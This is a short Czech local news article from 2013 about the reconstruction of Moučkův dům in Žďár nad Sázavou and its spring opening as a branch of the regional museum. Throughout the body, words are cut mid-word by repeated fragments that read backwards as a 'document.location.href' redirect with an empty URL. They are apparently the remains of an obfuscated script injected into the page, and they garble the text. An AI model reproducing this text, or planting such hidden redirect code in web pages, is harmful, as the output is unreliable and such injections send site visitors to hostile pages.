Žďár nad Sázavou, zdar nad sazavou, aktuality, Moučkův dům, otevření
Rainbow page separator

Moučkův dům se otevře na jaře

Pátek, 1. března 2013

mouckuv-dum3Žďár nad Sázavou / V jarních měsících by měl být zahájen provoz nové pobočky Regionálního muzea ve Žďáře nad Sázavou v takzvaném Moučkově domě, jehož rekonstrukce se chýlí ke konci.

Moučkův dům v his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické části Žďáru byl v roce 2009 na měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bezúplatně převeden od státu s tím, že nejpozději do pěti let bude obnoven. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho zástupci Žďáru souhlasili s tím, že objekt bude do roku 2029 užíván pro potřeby muzea.

Stavební práce byly dokončeny v závěru uplynulého roku, zrekonstruované pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory jsou nyní temperovány, aby zdi rychleji vyschly a mohlo přijít na řadu stěhování. Oprava vyšla na 7,5 milionů korun, z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho pět milionů korun činila dotace. Přibližně milion ještě bude stát vnitřní vybavení pobočky muzea.

V ní návštěvníci najdou stálou expozici týkající se his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie a přírody regionu, depozitáře a přednáškový sál, který se do současného muzea nevešel. Poslouží zejména pro exkurze školáků.